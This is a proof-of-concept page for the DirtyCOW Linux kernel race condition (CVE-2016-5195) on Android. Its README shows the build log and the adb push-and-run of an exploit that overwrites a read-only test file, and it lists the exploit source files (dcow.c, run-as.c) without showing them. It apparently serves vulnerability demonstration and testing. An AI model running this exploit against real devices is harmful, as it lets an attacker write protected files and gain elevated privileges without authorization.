CVE-2016-5195 PoC — Linux kernel 竞争条件问题漏洞

Source

Associated Vulnerability

Description

DirtyCOW Exploit for Android

Readme

# demo1

This demo is based on https://github.com/timwr/CVE-2016-5195

make test output:
```
user@user:/$ cd /home/user/demo1 && make test
/home/user/adb/android-ndk-r21d/ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=x86_64 APP_PLATFORM=android-23
make[1]: Entering directory '/home/user/demo1'
[x86_64] Install        : dirtycow => libs/x86_64/dirtycow
[x86_64] Install        : run-as => libs/x86_64/run-as
make[1]: Leaving directory '/home/user/demo1'
adb push libs/x86_64/dirtycow /data/local/tmp/dcow
libs/x86_64/dirtycow: 1 file pushed. 8.8 MB/s (10408 bytes in 0.001s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push test.sh /data/local/tmp/test.sh
test.sh: 1 file pushed. 0.5 MB/s (367 bytes in 0.001s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/test.sh'
adb shell '/data/local/tmp/test.sh'
-rw-rw-rw- shell    shell          18 2020-12-29 23:01 test
-rwxrwxrwx shell    shell         367 2020-12-29 18:24 test.sh
-r--r--r-- shell    shell          18 2020-12-29 23:01 test2
adb shell '/data/local/tmp/dcow /data/local/tmp/test /data/local/tmp/test2'
dcow /data/local/tmp/test /data/local/tmp/test2
[*] size 18
[*] mmap 0x7ff91dc4f000
[*] currently 0x7ff91dc4f000=76746f6e72756f79
[*] using /proc/self/mem method
[*] madvise = 0x7ff91dc4f000 18
[*] madvise = 0 5082
[*] /proc/self/mem 1431270 79515
[*] exploited 0 0x7ff91dc4f000=626172656e6c7576
adb shell 'cat /data/local/tmp/test2'
vulnerable!!!!!!!
adb shell 'cat /data/local/tmp/test2' | xxd
00000000: 7675 6c6e 6572 6162 6c65 2121 2121 2121  vulnerable!!!!!!
00000010: 210d 0a
```

File Snapshot

 [4.0K]  /data/pocs/d4cd48bf5abaff57cb032986896d38f7d3ad49d8
├── [ 346]  Android.mk
├── [5.2K]  dcow.c
├── [ 990]  Makefile
├── [1.6K]  README.md
├── [1.1K]  run-as.c
└── [ 360]  test.sh

0 directories, 6 files

Remarks